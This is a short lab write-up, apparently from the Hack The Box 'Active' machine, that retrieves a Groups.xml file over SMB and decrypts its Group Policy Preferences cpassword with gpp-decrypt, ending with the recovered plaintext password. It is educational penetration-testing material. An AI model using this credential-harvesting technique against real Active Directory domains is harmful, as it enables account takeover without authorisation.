Usage of gpp-decrypt Link to heading

“gpp-decrypt” is a tool built of python3 which can be used for decrypting AD related passwords.

During some of the active directory labs, I could see a “groups.xml” which contain the local admininistartor password in encrypted format. I have used the “gpp-decrypt” to decrypt the password.

smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> ls
  .                                   D        0  Sat Jul 21 06:37:44 2018
  ..                                  D        0  Sat Jul 21 06:37:44 2018
  Groups.xml                          A      533  Wed Jul 18 16:46:06 2018

                5217023 blocks of size 4096. 278651 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get Groups.xml 
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (0.9 KiloBytes/sec) (average 0.9 KiloBytes/sec)
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> exit

┌──(rocky㉿kali)-[~/hckbox/Active-1/smb]
└─$ cat Groups.xml  
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

Why this password was shown in this folder: Link to heading

This was due to the Microsoft group policy preference. Due to this settings a sysvol is created with encrypted password of admin. More can be read here.

Using “gpp-decrypt” to decrypt the encrypted local admin password Link to heading

Now we dowloaded the encrypted password which we can try decrypt with “gpp-decrypt” which is inbuilt with Kali or you can from [github repository](GitHub - t0thkr1s/gpp-decrypt: Tool to parse the Group Policy Preferences XML file which extracts the username and decrypts the cpassword attribute.).

─$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18